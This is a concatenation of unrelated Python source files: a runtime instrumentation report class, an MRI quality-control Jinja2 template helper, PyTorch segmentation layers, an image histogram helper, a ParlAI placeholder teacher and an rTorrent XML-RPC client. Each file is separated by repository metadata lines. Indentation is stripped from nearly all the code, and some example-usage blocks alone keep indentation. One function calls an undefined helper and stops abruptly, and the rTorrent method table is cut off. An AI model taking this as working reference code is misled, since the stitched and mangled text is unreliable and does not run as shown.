self.sdfg_hash = report['sdfgHash']
events = report['traceEvents']
for event in events:
if 'ph' in event:
phase = event['ph']
name = event['name']
if phase == 'X':
uuid = self.get_event_uuid(event)
if uuid not in self.durations:
self.durations[uuid] = {}
if name not in self.durations[uuid]:
self.durations[uuid][name] = []
self.durations[uuid][name].append(event['dur'] / 1000)
if phase == 'C':
if name not in self.counters:
self.counters[name] = 0
self.counters[name] += event['args'][name]
def __repr__(self):
return 'InstrumentationReport(name=%s)' % self.name
def sortby(self, column: str, ascending: bool = False):
if (column and column.lower()
not in ('counter', 'value', 'min', 'max', 'mean', 'median')):
raise ValueError('Only Counter, Value, Min, Max, Mean, Median are '
'supported')
self._sortcat = column if column is None else column.lower()
self._sortdesc = not ascending
def _get_runtimes_string(self,
label,
runtimes,
element,
sdfg,
state,
string,
row_format,
colw,
with_element_heading=True):
indent = ''
if len(runtimes) > 0:
element_label = ''
if element[0] > -1 and element[1] > -1 and element[2] > -1:
# This element is a node.
if sdfg != element[0]:
# No parent SDFG row present yet, print it.
string += row_format.format('SDFG (' + str(element[0]) +
')',
'',
'',
'',
'',
width=colw)
sdfg = element[0]
if state != element[1]:
# No parent state row present yet, print it.
string += row_format.format('|-State (' + str(element[1]) +
')',
'',
'',
'',
'',
width=colw)
state = element[1]
element_label = '| |-Node (' + str(element[2]) + ')'
indent = '| | |'
elif element[0] > -1 and element[1] > -1:
# This element is a state.
if sdfg != element[0]:
# No parent SDFG row present yet, print it.
string += row_format.format('SDFG (' + str(element[0]) +
')',
'',
'',
'',
'',
width=colw)
sdfg = element[0]
state = element[1]
element_label = '|-State (' + str(element[1]) + ')'
indent = '| |'
elif element[0] > -1:
# This element is an SDFG.
sdfg = element[0]
state = -1
element_label = 'SDFG (' + str(element[0]) + ')'
indent = '|'
else:
element_label = 'N/A'
if with_element_heading:
string += row_format.format(element_label,
'',
'',
'',
'',
width=colw)
string += row_format.format(indent + label + ':',
'',
'',
'',
'',
width=colw)
string += row_format.format(indent,
'%.3f' % np.min(runtimes),
'%.3f' % np.mean(runtimes),
'%.3f' % np.median(runtimes),
'%.3f' % np.max(runtimes),
width=colw)
return string, sdfg, state
def getkey(self, element):
events = self.durations[element]
result = []
for event in events.keys():
runtimes = events[event]
result.extend(runtimes)
result = np.array(result)
if self._sortcat == 'min':
return np.min(result)
elif self._sortcat == 'max':
return np.max(result)
elif self._sortcat == 'mean':
return np.mean(result)
else: # if self._sortcat == 'median':
return np.median(result)
def __str__(self):
COLW = 15
COUNTER_COLW = 39
element_list = list(self.durations.keys())
element_list.sort()
row_format = ('{:<{width}}' * 5) + '\n'
counter_format = ('{:<{width}}' * 2) + '\n'
string = 'Instrumentation report\n'
string += 'SDFG Hash: ' + self.sdfg_hash + '\n'
if len(self.durations) > 0:
string += ('-' * (COLW * 5)) + '\n'
string += ('{:<{width}}' * 2).format(
'Element', 'Runtime (ms)', width=COLW) + '\n'
string += row_format.format('',
'Min',
'Mean',
'Median',
'Max',
width=COLW)
string += ('-' * (COLW * 5)) + '\n'
sdfg = -1
state = -1
if self._sortcat in ('min', 'mean', 'median', 'max'):
element_list = sorted(element_list,
key=self.getkey,
reverse=self._sortdesc)
for element in element_list:
events = self.durations[element]
if len(events) > 0:
with_element_heading = True
for event in events.keys():
runtimes = events[event]
string, sdfg, state = self._get_runtimes_string(
event, runtimes, element, sdfg, state, string,
row_format, COLW, with_element_heading)
with_element_heading = False
string += ('-' * (COLW * 5)) + '\n'
if len(self.counters) > 0:
string += ('-' * (COUNTER_COLW * 2)) + '\n'
string += ('{:<{width}}' * 2).format(
'Counter', 'Value', width=COUNTER_COLW) + '\n'
string += ('-' * (COUNTER_COLW * 2)) + '\n'
if self._sortcat == 'value':
counter_list = sorted(self.counters,
key=lambda k: self.counters[k],
reverse=self._sortdesc)
elif self._sortcat == 'counter':
counter_list = sorted(self.counters.keys(),
reverse=self._sortdesc)
else:
counter_list = self.counters.keys()
for counter in counter_list:
string += counter_format.format(counter,
self.counters[counter],
width=COUNTER_COLW)
string += ('-' * (COUNTER_COLW * 2)) + '\n'
return string
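# Example usage (a minimal sketch; the report file name below is an assumption):
if __name__ == '__main__':
    report = InstrumentationReport('report-1234.json')
    report.sortby('Mean', ascending=True)  # sort duration rows by mean runtime
    print(report)  # renders the min/mean/median/max table and any counters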
|
mriqc/data/config.py
|
apiccirilli/mriqc
| 176 |
88640
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
"""Utilities: Jinja2 templates."""
from io import open # pylint: disable=W0622
import jinja2
from pkg_resources import resource_filename as pkgrf
class Template(object):
"""
Utility class for generating a config file from a jinja template.
https://github.com/oesteban/endofday/blob/f2e79c625d648ef45b08cc1f11fd0bd84342d604/endofday/core/template.py
"""
def __init__(self, template_str):
self.template_str = template_str
self.env = jinja2.Environment(
loader=jinja2.FileSystemLoader(searchpath="/"),
trim_blocks=True,
lstrip_blocks=True,
)
def compile(self, configs):
"""Generates a string with the replacements"""
template = self.env.get_template(self.template_str)
return template.render(configs)
def generate_conf(self, configs, path):
"""Saves the oucome after replacement on the template to file"""
output = self.compile(configs)
with open(path, "w+") as output_file:
output_file.write(output)
class IndividualTemplate(Template):
"""Specific template for the individual report"""
def __init__(self):
super(IndividualTemplate, self).__init__(
pkgrf("mriqc", "data/reports/individual.html")
)
class GroupTemplate(Template):
"""Specific template for the individual report"""
def __init__(self):
super(GroupTemplate, self).__init__(pkgrf("mriqc", "data/reports/group.html"))
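# Example usage (a minimal sketch; the template path and config keys are assumptions).
# Templates are referenced by absolute path because the loader's searchpath is "/",
# which is how IndividualTemplate/GroupTemplate resolve their bundled templates:
#   tpl = Template('/path/to/report_template.html')
#   tpl.generate_conf({'title': 'Subject 01'}, '/tmp/report.html')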
|
libs/core/operators.py
|
PINTO0309/Fast_Seg
| 201 |
88653
|
# Common Segmentation Operator implemented by Pytorch
# XiangtaiLi(<EMAIL>)
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import BatchNorm2d
upsample = lambda x, size: F.interpolate(x, size, mode='bilinear', align_corners=True)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class GlobalAvgPool2d(nn.Module):
def __init__(self):
"""Global average pooling over the input's spatial dimensions"""
super(GlobalAvgPool2d, self).__init__()
def forward(self, inputs):
in_size = inputs.size()
inputs = inputs.view((in_size[0], in_size[1], -1)).mean(dim=2)
inputs = inputs.view(in_size[0], in_size[1], 1, 1)
return inputs
class SELayer(nn.Module):
def __init__(self, in_planes, out_planes, reduction=16):
super(SELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Linear(in_planes, out_planes // reduction),
nn.ReLU(inplace=True),
nn.Linear(out_planes // reduction, out_planes),
nn.Sigmoid()
)
self.out_planes = out_planes
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.fc(y).view(b, self.out_planes, 1, 1)
return y
class ConvBnRelu(nn.Module):
def __init__(self, in_planes, out_planes, ksize, stride=1, pad=0, dilation=1,
groups=1, has_bn=True, norm_layer=nn.BatchNorm2d, bn_eps=1e-5,
has_relu=True, inplace=True, has_bias=False):
super(ConvBnRelu, self).__init__()
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=ksize,
stride=stride, padding=pad,
dilation=dilation, groups=groups, bias=has_bias)
self.has_bn = has_bn
if self.has_bn:
self.bn = norm_layer(out_planes, eps=bn_eps)
self.has_relu = has_relu
if self.has_relu:
self.relu = nn.ReLU(inplace=inplace)
def forward(self, x):
x = self.conv(x)
if self.has_bn:
x = self.bn(x)
if self.has_relu:
x = self.relu(x)
return x
def dsn(in_channels, nclass, norm_layer=nn.BatchNorm2d):
return nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
norm_layer(in_channels),
nn.ReLU(),
nn.Dropout2d(0.1),
nn.Conv2d(in_channels, nclass, kernel_size=1, stride=1, padding=0, bias=True)
)
class SeparableConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, bias=False, norm_layer=None):
super(SeparableConv2d, self).__init__()
self.kernel_size = kernel_size
self.dilation = dilation
self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size, stride, 0, dilation, groups=in_channels,
bias=bias)
self.bn = norm_layer(in_channels)
self.pointwise = nn.Conv2d(in_channels, out_channels, 1, bias=bias)
def forward(self, x):
x = self.fix_padding(x, self.kernel_size, self.dilation)
x = self.conv1(x)
x = self.bn(x)
x = self.pointwise(x)
return x
def fix_padding(self, x, kernel_size, dilation):
kernel_size_effective = kernel_size + (kernel_size - 1) * (dilation - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
padded_inputs = F.pad(x, (pad_beg, pad_end, pad_beg, pad_end))
return padded_inputs
class ASPPModule(nn.Module):
"""
Reference:
Chen, Liang-Chieh, et al. *"Rethinking Atrous Convolution for Semantic Image Segmentation."*
"""
def __init__(self, features, inner_features=256, out_features=512, dilations=(12, 24, 36), norm_layer=nn.BatchNorm2d):
super(ASPPModule, self).__init__()
self.conv1 = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),
nn.Conv2d(features, inner_features, kernel_size=1, padding=0, dilation=1,
bias=False),
norm_layer(inner_features),
nn.ReLU()
)
self.conv2 = nn.Sequential(
nn.Conv2d(features, inner_features, kernel_size=1, padding=0, dilation=1, bias=False),
norm_layer(inner_features), nn.ReLU())
self.conv3 = nn.Sequential(
nn.Conv2d(features, inner_features, kernel_size=3, padding=dilations[0], dilation=dilations[0], bias=False),
norm_layer(inner_features), nn.ReLU())
self.conv4 = nn.Sequential(
nn.Conv2d(features, inner_features, kernel_size=3, padding=dilations[1], dilation=dilations[1], bias=False),
norm_layer(inner_features), nn.ReLU())
self.conv5 = nn.Sequential(
nn.Conv2d(features, inner_features, kernel_size=3, padding=dilations[2], dilation=dilations[2], bias=False),
norm_layer(inner_features), nn.ReLU())
self.bottleneck = nn.Sequential(
nn.Conv2d(inner_features * 5, out_features, kernel_size=1, padding=0, dilation=1, bias=False),
norm_layer(out_features),
nn.ReLU(),
nn.Dropout2d(0.1)
)
def forward(self, x):
_, _, h, w = x.size()
feat1 = F.upsample(self.conv1(x), size=(h, w), mode='bilinear', align_corners=True)
feat2 = self.conv2(x)
feat3 = self.conv3(x)
feat4 = self.conv4(x)
feat5 = self.conv5(x)
out = torch.cat((feat1, feat2, feat3, feat4, feat5), 1)
bottle = self.bottleneck(out)
return bottle
class A2Block(nn.Module):
"""
Implementation of A2Block(NIPS 2018)
"""
def __init__(self, inplane, plane):
super(A2Block, self).__init__()
self.down = nn.Conv2d(inplane, plane, 1)
self.up = nn.Conv2d(plane, inplane, 1)
self.gather_down = nn.Conv2d(inplane, plane, 1)
self.distribue_down = nn.Conv2d(inplane, plane, 1)
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
res = x
A = self.down(res)
B = self.gather_down(res)
b, c, h, w = A.size()
A = A.view(b, c, -1) # (b, c, h*w)
B = B.view(b, c, -1) # (b, c, h*w)
B = self.softmax(B)
B = B.permute(0, 2, 1) # (b, h*w, c)
G = torch.bmm(A, B) # (b,c,c)
C = self.distribue_down(res)
C = C.view(b, c, -1) # (b, c, h*w)
C = self.softmax(C)
C = C.permute(0, 2, 1) # (b, h*w, c)
atten = torch.bmm(C, G) # (b, h*w, c)
atten = atten.permute(0, 2, 1).view(b, c, h, -1)
atten = self.up(atten)
out = res + atten
return out
class PSPModule(nn.Module):
"""
Reference:
Zhao, Hengshuang, et al. *"Pyramid scene parsing network."*
"""
def __init__(self, features, out_features=512, sizes=(1, 2, 3, 6), norm_layer=BatchNorm2d):
super(PSPModule, self).__init__()
self.stages = []
self.stages = nn.ModuleList([self._make_stage(features, out_features, size, norm_layer) for size in sizes])
self.bottleneck = nn.Sequential(
nn.Conv2d(features+len(sizes)*out_features, out_features, kernel_size=1, padding=1, dilation=1, bias=False),
norm_layer(out_features),
nn.ReLU(),
nn.Dropout2d(0.1)
)
def _make_stage(self, features, out_features, size, norm_layer):
prior = nn.AdaptiveAvgPool2d(output_size=(size, size))
conv = nn.Conv2d(features, out_features, kernel_size=1, bias=False)
bn = norm_layer(out_features)
return nn.Sequential(prior, conv, bn)
def forward(self, feats):
h, w = feats.size(2), feats.size(3)
priors = [F.upsample(input=stage(feats), size=(h, w), mode='bilinear', align_corners=True) for stage in self.stages] + [feats]
bottle = self.bottleneck(torch.cat(priors, 1))
return bottle
# For BiSeNet
class AttentionRefinement(nn.Module):
def __init__(self, in_planes, out_planes,
norm_layer=nn.BatchNorm2d):
super(AttentionRefinement, self).__init__()
self.conv_3x3 = ConvBnRelu(in_planes, out_planes, 3, 1, 1,
has_bn=True, norm_layer=norm_layer,
has_relu=True, has_bias=False)
self.channel_attention = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
ConvBnRelu(out_planes, out_planes, 1, 1, 0,
has_bn=True, norm_layer=norm_layer,
has_relu=False, has_bias=False),
nn.Sigmoid()
)
def forward(self, x):
fm = self.conv_3x3(x)
fm_se = self.channel_attention(fm)
fm = fm * fm_se
return fm
# For BiSeNet
class FeatureFusion(nn.Module):
def __init__(self, in_planes, out_planes,
reduction=1, norm_layer=nn.BatchNorm2d):
super(FeatureFusion, self).__init__()
self.conv_1x1 = ConvBnRelu(in_planes, out_planes, 1, 1, 0,
has_bn=True, norm_layer=norm_layer,
has_relu=True, has_bias=False)
self.channel_attention = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
ConvBnRelu(out_planes, out_planes // reduction, 1, 1, 0,
has_bn=False, norm_layer=norm_layer,
has_relu=True, has_bias=False),
ConvBnRelu(out_planes // reduction, out_planes, 1, 1, 0,
has_bn=False, norm_layer=norm_layer,
has_relu=False, has_bias=False),
nn.Sigmoid()
)
def forward(self, x1, x2):
fm = torch.cat([x1, x2], dim=1)
fm = self.conv_1x1(fm)
fm_se = self.channel_attention(fm)
output = fm + fm * fm_se
return output
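# Example usage (a minimal sketch; the batch/channel/spatial sizes are arbitrary):
if __name__ == '__main__':
    x = torch.randn(2, 2048, 32, 32)
    aspp = ASPPModule(2048, inner_features=256, out_features=512)
    out = aspp(x)  # five parallel branches concatenated, then a 1x1 bottleneck
    print(out.shape)  # torch.Size([2, 512, 32, 32])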
|
classification/tools.py
|
badheshchauhan/python
| 204 |
88658
|
<filename>classification/tools.py
from matplotlib.image import imread
import matplotlib.pyplot as plt
from math import sqrt
import math
import random
import numpy
import operator
from scipy.spatial.distance import cdist
from scipy.linalg import norm
import datetime
def Histogram(path):
image = imread(path)
if len(image.shape) != 2:
def gray(rgb): return numpy.dot(rgb[..., :3], [0.2989, 0.5870, 0.1140])
gray = gray(image)
image = gray
hist, bins = numpy.histogram(image.ravel(), 256, [0, 256])
return adapt(hist)
|
parlai/tasks/self_chat/agents.py
|
zl930216/ParlAI
| 9,228 |
88688
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Model self chat.
"""
from parlai.core.teachers import Teacher
class DefaultTeacher(Teacher):
def __init__(self, opt, shared=None):
raise RuntimeError(
'-t self_chat is a dummy helper, and not meant to be used directly.'
)
|
lib/rtorrent/__init__.py
|
Slashbunny/maraschino
| 137 |
88692
|
<filename>lib/rtorrent/__init__.py<gh_stars>100-1000
# Copyright (c) 2013 <NAME>, <<EMAIL>>
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import urllib
import os.path
import time
import xmlrpclib
from rtorrent.common import find_torrent, \
is_valid_port, convert_version_tuple_to_str
from rtorrent.lib.torrentparser import TorrentParser
from rtorrent.lib.xmlrpc.http import HTTPServerProxy
from rtorrent.lib.xmlrpc.scgi import SCGIServerProxy
from rtorrent.rpc import Method
from rtorrent.lib.xmlrpc.basic_auth import BasicAuthTransport
from rtorrent.torrent import Torrent
from rtorrent.group import Group
import rtorrent.rpc # @UnresolvedImport
__version__ = "0.2.9"
__author__ = "<NAME>"
__contact__ = "<EMAIL>"
__license__ = "MIT"
MIN_RTORRENT_VERSION = (0, 8, 1)
MIN_RTORRENT_VERSION_STR = convert_version_tuple_to_str(MIN_RTORRENT_VERSION)
class RTorrent:
""" Create a new rTorrent connection """
rpc_prefix = None
    def __init__(self, uri, username=None, password=None,
verify=False, sp=None, sp_kwargs=None):
self.uri = uri # : From X{__init__(self, url)}
self.username = username
self.password = password
self.schema = urllib.splittype(uri)[0]
if sp:
self.sp = sp
elif self.schema in ['http', 'https']:
self.sp = HTTPServerProxy
elif self.schema == 'scgi':
self.sp = SCGIServerProxy
else:
raise NotImplementedError()
self.sp_kwargs = sp_kwargs or {}
self.torrents = [] # : List of L{Torrent} instances
self._rpc_methods = [] # : List of rTorrent RPC methods
self._torrent_cache = []
self._client_version_tuple = ()
if verify is True:
self._verify_conn()
def _get_conn(self):
"""Get ServerProxy instance"""
if self.username is not None and self.password is not None:
if self.schema == 'scgi':
raise NotImplementedError()
return self.sp(
self.uri,
transport=BasicAuthTransport(self.username, self.password),
**self.sp_kwargs
)
return self.sp(self.uri, **self.sp_kwargs)
def _verify_conn(self):
# check for rpc methods that should be available
assert "system.client_version" in self._get_rpc_methods(), "Required RPC method not available."
assert "system.library_version" in self._get_rpc_methods(), "Required RPC method not available."
# minimum rTorrent version check
assert self._meets_version_requirement() is True,\
"Error: Minimum rTorrent version required is {0}".format(
MIN_RTORRENT_VERSION_STR)
def _meets_version_requirement(self):
return self._get_client_version_tuple() >= MIN_RTORRENT_VERSION
def _get_client_version_tuple(self):
conn = self._get_conn()
if not self._client_version_tuple:
if not hasattr(self, "client_version"):
setattr(self, "client_version",
conn.system.client_version())
rtver = getattr(self, "client_version")
self._client_version_tuple = tuple([int(i) for i in
rtver.split(".")])
return self._client_version_tuple
def _update_rpc_methods(self):
self._rpc_methods = self._get_conn().system.listMethods()
return self._rpc_methods
def _get_rpc_methods(self):
""" Get list of raw RPC commands
@return: raw RPC commands
@rtype: list
"""
return(self._rpc_methods or self._update_rpc_methods())
def get_torrents(self, view="main"):
"""Get list of all torrents in specified view
@return: list of L{Torrent} instances
@rtype: list
@todo: add validity check for specified view
"""
self.torrents = []
methods = rtorrent.torrent.methods
retriever_methods = [m for m in methods
if m.is_retriever() and m.is_available(self)]
m = rtorrent.rpc.Multicall(self)
m.add("d.multicall", view, "d.get_hash=",
*[method.rpc_call + "=" for method in retriever_methods])
results = m.call()[0] # only sent one call, only need first result
for result in results:
results_dict = {}
# build results_dict
for m, r in zip(retriever_methods, result[1:]): # result[0] is the info_hash
results_dict[m.varname] = rtorrent.rpc.process_result(m, r)
self.torrents.append(
Torrent(self, info_hash=result[0], **results_dict)
)
self._manage_torrent_cache()
return(self.torrents)
def _manage_torrent_cache(self):
"""Carry tracker/peer/file lists over to new torrent list"""
for torrent in self._torrent_cache:
new_torrent = rtorrent.common.find_torrent(torrent.info_hash,
self.torrents)
if new_torrent is not None:
new_torrent.files = torrent.files
new_torrent.peers = torrent.peers
new_torrent.trackers = torrent.trackers
self._torrent_cache = self.torrents
def _get_load_function(self, file_type, start, verbose):
"""Determine correct "load torrent" RPC method"""
func_name = None
if file_type == "url":
# url strings can be input directly
if start and verbose:
func_name = "load_start_verbose"
elif start:
func_name = "load_start"
elif verbose:
func_name = "load_verbose"
else:
func_name = "load"
elif file_type in ["file", "raw"]:
if start and verbose:
func_name = "load_raw_start_verbose"
elif start:
func_name = "load_raw_start"
elif verbose:
func_name = "load_raw_verbose"
else:
func_name = "load_raw"
return(func_name)
def load_torrent(self, torrent, start=False, verbose=False, verify_load=True):
"""
Loads torrent into rTorrent (with various enhancements)
@param torrent: can be a url, a path to a local file, or the raw data
of a torrent file
@type torrent: str
@param start: start torrent when loaded
@type start: bool
@param verbose: print error messages to rTorrent log
@type verbose: bool
@param verify_load: verify that torrent was added to rTorrent successfully
@type verify_load: bool
@return: Depends on verify_load:
- if verify_load is True, (and the torrent was
loaded successfully), it'll return a L{Torrent} instance
- if verify_load is False, it'll return None
@rtype: L{Torrent} instance or None
@raise AssertionError: If the torrent wasn't successfully added to rTorrent
- Check L{TorrentParser} for the AssertionError's
it raises
@note: Because this function includes url verification (if a url was input)
as well as verification as to whether the torrent was successfully added,
this function doesn't execute instantaneously. If that's what you're
looking for, use load_torrent_simple() instead.
"""
p = self._get_conn()
tp = TorrentParser(torrent)
torrent = xmlrpclib.Binary(tp._raw_torrent)
info_hash = tp.info_hash
func_name = self._get_load_function("raw", start, verbose)
# load torrent
getattr(p, func_name)(torrent)
if verify_load:
MAX_RETRIES = 3
i = 0
while i < MAX_RETRIES:
self.get_torrents()
if info_hash in [t.info_hash for t in self.torrents]:
break
# was still getting AssertionErrors, delay should help
time.sleep(1)
i += 1
assert info_hash in [t.info_hash for t in self.torrents],\
"Adding torrent was unsuccessful."
return(find_torrent(info_hash, self.torrents))
def load_torrent_simple(self, torrent, file_type,
start=False, verbose=False):
"""Loads torrent into rTorrent
@param torrent: can be a url, a path to a local file, or the raw data
of a torrent file
@type torrent: str
@param file_type: valid options: "url", "file", or "raw"
@type file_type: str
@param start: start torrent when loaded
@type start: bool
@param verbose: print error messages to rTorrent log
@type verbose: bool
@return: None
@raise AssertionError: if incorrect file_type is specified
        @note: This function was written for speed; it includes no enhancements.
If you input a url, it won't check if it's valid. You also can't get
verification that the torrent was successfully added to rTorrent.
Use load_torrent() if you would like these features.
"""
p = self._get_conn()
assert file_type in ["raw", "file", "url"], \
"Invalid file_type, options are: 'url', 'file', 'raw'."
func_name = self._get_load_function(file_type, start, verbose)
if file_type == "file":
# since we have to assume we're connected to a remote rTorrent
# client, we have to read the file and send it to rT as raw
assert os.path.isfile(torrent), \
"Invalid path: \"{0}\"".format(torrent)
torrent = open(torrent, "rb").read()
if file_type in ["raw", "file"]:
finput = xmlrpclib.Binary(torrent)
elif file_type == "url":
finput = torrent
getattr(p, func_name)(finput)
def get_views(self):
p = self._get_conn()
return p.view_list()
def create_group(self, name, persistent=True, view=None):
p = self._get_conn()
if persistent is True:
p.group.insert_persistent_view('', name)
else:
assert view is not None, "view parameter required on non-persistent groups"
p.group.insert('', name, view)
self._update_rpc_methods()
def get_group(self, name):
assert name is not None, "group name required"
group = Group(self, name)
group.update()
return group
def set_dht_port(self, port):
"""Set DHT port
@param port: port
@type port: int
@raise AssertionError: if invalid port is given
"""
assert is_valid_port(port), "Valid port range is 0-65535"
        self.dht_port = self._get_conn().set_dht_port(port)
def enable_check_hash(self):
"""Alias for set_check_hash(True)"""
self.set_check_hash(True)
def disable_check_hash(self):
"""Alias for set_check_hash(False)"""
self.set_check_hash(False)
def find_torrent(self, info_hash):
"""Frontend for rtorrent.common.find_torrent"""
return(rtorrent.common.find_torrent(info_hash, self.get_torrents()))
def poll(self):
""" poll rTorrent to get latest torrent/peer/tracker/file information
@note: This essentially refreshes every aspect of the rTorrent
connection, so it can be very slow if working with a remote
connection that has a lot of torrents loaded.
@return: None
"""
self.update()
torrents = self.get_torrents()
for t in torrents:
t.poll()
def update(self):
"""Refresh rTorrent client info
@note: All fields are stored as attributes to self.
@return: None
"""
multicall = rtorrent.rpc.Multicall(self)
retriever_methods = [m for m in methods
if m.is_retriever() and m.is_available(self)]
for method in retriever_methods:
multicall.add(method)
multicall.call()
def _build_class_methods(class_obj):
# multicall add class
caller = lambda self, multicall, method, *args:\
multicall.add(method, self.rpc_id, *args)
caller.__doc__ = """Same as Multicall.add(), but with automatic inclusion
of the rpc_id
@param multicall: A L{Multicall} instance
@type: multicall: Multicall
@param method: L{Method} instance or raw rpc method
@type: Method or str
@param args: optional arguments to pass
"""
setattr(class_obj, "multicall_add", caller)
def __compare_rpc_methods(rt_new, rt_old):
from pprint import pprint
rt_new_methods = set(rt_new._get_rpc_methods())
rt_old_methods = set(rt_old._get_rpc_methods())
print("New Methods:")
pprint(rt_new_methods - rt_old_methods)
print("Methods not in new rTorrent:")
pprint(rt_old_methods - rt_new_methods)
def __check_supported_methods(rt):
from pprint import pprint
supported_methods = set([m.rpc_call for m in
methods +
rtorrent.file.methods +
rtorrent.torrent.methods +
rtorrent.tracker.methods +
rtorrent.peer.methods])
all_methods = set(rt._get_rpc_methods())
print("Methods NOT in supported methods")
pprint(all_methods - supported_methods)
print("Supported methods NOT in all methods")
pprint(supported_methods - all_methods)
methods = [
# RETRIEVERS
Method(RTorrent, 'get_xmlrpc_size_limit', 'get_xmlrpc_size_limit'),
Method(RTorrent, 'get_proxy_address', 'get_proxy_address'),
Method(RTorrent, 'get_split_suffix', 'get_split_suffix'),
Method(RTorrent, 'get_up_limit', 'get_upload_rate'),
Method(RTorrent, 'get_max_memory_usage', 'get_max_memory_usage'),
Method(RTorrent, 'get_max_open_files', 'get_max_open_files'),
Method(RTorrent, 'get_min_peers_seed', 'get_min_peers_seed'),
Method(RTorrent, 'get_use_udp_trackers', 'get_use_udp_trackers'),
Method(RTorrent, 'get_preload_min_size', 'get_preload_min_size'),
Method(RTorrent, 'get_max_uploads', 'get_max_uploads'),
Method(RTorrent, 'get_max_peers', 'get_max_peers'),
Method(RTorrent, 'get_timeout_sync', 'get_timeout_sync'),
Method(RTorrent, 'get_receive_buffer_size', 'get_receive_buffer_size'),
Method(RTorrent, 'get_split_file_size', 'get_split_file_size'),
Method(RTorrent, 'get_dht_throttle', 'get_dht_throttle'),
Method(RTorrent, 'get_max_peers_seed', 'get_max_peers_seed'),
Method(RTorrent, 'get_min_peers', 'get_min_peers'),
Method(RTorrent, 'get_tracker_numwant', 'get_tracker_numwant'),
Method(RTorrent, 'get_max_open_sockets', 'get_max_open_sockets'),
Method(RTorrent, 'get_session', 'get_session'),
Method(RTorrent, 'get_ip', 'get_ip'),
Method(RTorrent, 'get_scgi_dont_route', 'get_scgi_dont_route'),
Method(RTorrent, 'get_hash_read_ahead', 'get_hash_read_ahead'),
Method(RTorrent, 'get_http_cacert', 'get_http_cacert'),
Method(RTorrent, 'get_dht_port', 'get_dht_port'),
Method(RTorrent, 'get_handshake_log', 'get_handshake_log'),
Method(RTorrent, 'get_preload_type', 'get_preload_type'),
Method(RTorrent, 'get_max_open_http', 'get_max_open_http'),
Method(RTorrent, 'get_http_capath', 'get_http_capath'),
Method(RTorrent, 'get_max_downloads_global', 'get_max_downloads_global'),
Method(RTorrent, 'get_name', 'get_name'),
Method(RTorrent, 'get_session_on_completion', 'get_session_on_completion'),
Method(RTorrent, 'get_down_limit', 'get_download_rate'),
Method(RTorrent, 'get_down_total', 'get_down_total'),
Method(RTorrent, 'get_up_rate', 'get_up_rate'),
Method(RTorrent, 'get_hash_max_tries', 'get_hash_max_tries'),
Method(RTorrent, 'get_peer_exchange', 'get_peer_exchange'),
Method(RTorrent, 'get_down_rate', 'get_down_rate'),
Method(RTorrent, 'get_connection_seed', 'get_connection_seed'),
Method(RTorrent, 'get_http_proxy', 'get_http_proxy'),
Method(RTorrent, 'get_stats_preloaded', 'get_stats_preloaded'),
Method(RTorrent, 'get_timeout_safe_sync', 'get_timeout_safe_sync'),
Method(RTorrent, 'get_hash_interval', 'get_hash_interval'),
Method(RTorrent, 'get_port_random', 'get_port_random'),
Method(RTorrent, 'get_directory', 'get_directory'),
Method(RTorrent, 'get_port_open', 'get_port_open'),
Method(RTorrent, 'get_max_file_size', 'get_max_file_size'),
Method(RTorrent, 'get_stats_not_preloaded', 'get_stats_not_preloaded'),
Method(RTorrent, 'get_memory_usage', 'get_memory_usage'),
Method(RTorrent, 'get_connection_leech', 'get_connection_leech'),
Method(RTorrent, 'get_check_hash', 'get_check_hash',
boolean=True,
),
Method(RTorrent, 'get_session_lock', 'get_session_lock'),
Method(RTorrent, 'get_preload_required_rate', 'get_preload_required_rate'),
Method(RTorrent, 'get_max_uploads_global', 'get_max_uploads_global'),
Method(RTorrent, 'get_send_buffer_size', 'get_send_buffer_size'),
Method(RTorrent, 'get_port_range', 'get_port_range'),
Method(RTorrent, 'get_max_downloads_div', 'get_max_downloads_div'),
Method(RTorrent, 'get_max_uploads_div', 'get_max_uploads_div'),
